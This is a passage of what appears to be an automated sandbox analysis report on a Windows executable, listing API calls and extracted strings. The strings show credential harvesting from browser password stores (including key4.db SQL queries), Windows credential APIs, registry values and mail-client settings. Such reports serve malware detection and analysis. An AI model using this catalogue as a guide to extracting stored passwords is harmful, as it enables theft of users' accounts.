                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                          • API String ID: 2238633743-192783356
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                          • SetFocus.USER32(?), ref: 0040BC29
                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                          • strlen.MSVCRT ref: 0040BC59
                                          • strlen.MSVCRT ref: 0040BC67
                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                          • memset.MSVCRT ref: 0040BD36
                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                          • API String ID: 2303586283-933021314
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 633282248-1996832678
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 710961058-601624466
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                          • API String ID: 231171946-1411472696
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                          • API String ID: 1012775001-1916105108
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                            • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                            • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                            • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                            • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                          • strlen.MSVCRT ref: 0040EAF0
                                          • strlen.MSVCRT ref: 0040EAFE
                                          • memset.MSVCRT ref: 0040EB3F
                                          • strlen.MSVCRT ref: 0040EB4E
                                          • strlen.MSVCRT ref: 0040EB5C
                                          • memset.MSVCRT ref: 0040EB9D
                                          • strlen.MSVCRT ref: 0040EBAC
                                          • strlen.MSVCRT ref: 0040EBBA
                                          • _strcmpi.MSVCRT ref: 0040EC68
                                          • _mbscpy.MSVCRT ref: 0040EC83
                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                          • API String ID: 3884059725-3138536805
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 1439213657-1959339147
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00443AF6
                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                          • strlen.MSVCRT ref: 00443B12
                                          • memset.MSVCRT ref: 00443B4C
                                          • memset.MSVCRT ref: 00443B60
                                          • memset.MSVCRT ref: 00443B74
                                          • memset.MSVCRT ref: 00443B9A
                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                          • memcpy.MSVCRT ref: 00443BD1
                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                          • memcpy.MSVCRT ref: 00443C0D
                                          • memcpy.MSVCRT ref: 00443C1F
                                          • _mbscpy.MSVCRT ref: 00443CF6
                                          • memcpy.MSVCRT ref: 00443D27
                                          • memcpy.MSVCRT ref: 00443D39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen$_mbscpy
                                          • String ID: salu
                                          • API String ID: 3691931180-4177317985
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                          • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                          • API String ID: 2449869053-232097475
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • sprintf.MSVCRT ref: 004092EC
                                          • LoadMenuA.USER32(?,?), ref: 004092FA
                                            • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                            • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                            • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                            • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                          • DestroyMenu.USER32(00000000), ref: 00409318
                                          • sprintf.MSVCRT ref: 0040935C
                                          • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                          • memset.MSVCRT ref: 0040938D
                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                          • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                          • DestroyWindow.USER32(00000000), ref: 004093CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                          • String ID: caption$dialog_%d$menu_%d
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                          • memset.MSVCRT ref: 0040F1BF
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                          • LocalFree.KERNEL32(?), ref: 0040F2A1
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                          • String ID: Creds$ps:password
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • wcsstr.MSVCRT ref: 0040424C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                          • _mbscpy.MSVCRT ref: 004042B7
                                          • _mbscpy.MSVCRT ref: 004042CA
                                          • strchr.MSVCRT ref: 004042D8
                                          • strlen.MSVCRT ref: 004042EC
                                          • sprintf.MSVCRT ref: 0040430D
                                          • strchr.MSVCRT ref: 0040431E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                          • String ID: %s@gmail.com$www.google.com
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _mbscpy.MSVCRT ref: 004094BA
                                          • _mbscpy.MSVCRT ref: 004094CA
                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                          • _mbscpy.MSVCRT ref: 00409512
                                          • memset.MSVCRT ref: 0040952E
                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                          • SetCursor.USER32(00000000), ref: 0040C855
                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                          • SetFocus.USER32(?), ref: 0040C8B2
                                          • SetFocus.USER32(?), ref: 0040C92B
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • strchr.MSVCRT ref: 0040FA5C
                                          • _mbscpy.MSVCRT ref: 0040FA6A
                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                            • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                          • _mbscpy.MSVCRT ref: 0040FABA
                                          • _mbscat.MSVCRT ref: 0040FAC5
                                          • memset.MSVCRT ref: 0040FAA1
                                            • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                          • memset.MSVCRT ref: 0040FAE9
                                          • memcpy.MSVCRT ref: 0040FB04
                                          • _mbscat.MSVCRT ref: 0040FB0F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                          • String ID: \systemroot
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • key4.db, xrefs: 00406632
                                          • C@, xrefs: 00406625
                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$memcmpmemsetstrlen
                                          • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$strlen
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                          • wcslen.MSVCRT ref: 004084C2
                                          • _wcsncoll.MSVCRT ref: 00408506
                                          • memset.MSVCRT ref: 0040859A
                                          • memcpy.MSVCRT ref: 004085BE
                                          • wcschr.MSVCRT ref: 00408612
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                          • String ID: J$Microsoft_WinInet
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                          • memcpy.MSVCRT ref: 004102D6
                                          Strings
                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                          • strlen.MSVCRT ref: 00406A6A
                                          • _mbscpy.MSVCRT ref: 00406A7A
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                          • _mbscpy.MSVCRT ref: 00406A94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                          • String ID: Unknown Error$netmsg.dll
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                          • _mbscpy.MSVCRT ref: 004093F7
                                          • _mbscpy.MSVCRT ref: 00409407
                                          • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                            • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                          • memcpy.MSVCRT ref: 00409A04
                                          • memcpy.MSVCRT ref: 00409A21
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                          • String ID: $$d
                                          • API String ID: 2915808112-2066904009
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                          • strchr.MSVCRT ref: 0040326D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileStringstrchr
                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                          • API String ID: 1348940319-1729847305
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                          • memset.MSVCRT ref: 0040F396
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                          • _strnicmp.MSVCRT ref: 0040F3C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                          • String ID: WindowsLive:name=*$windowslive:name=
                                          • API String ID: 945165440-3589380929
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                            • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                          • strchr.MSVCRT ref: 00403711
                                          • _mbscpy.MSVCRT ref: 0040373A
                                          • _mbscpy.MSVCRT ref: 0040374A
                                          • strlen.MSVCRT ref: 0040376A
                                          • sprintf.MSVCRT ref: 0040378E
                                          • _mbscpy.MSVCRT ref: 004037A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                          • String ID: %s@gmail.com
                                          • API String ID: 500647785-4097000612
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00409239
                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                          • memset.MSVCRT ref: 0040927D
                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                          • _strcmpi.MSVCRT ref: 004092A2
                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                          Strings
                                          Memory Dump Source
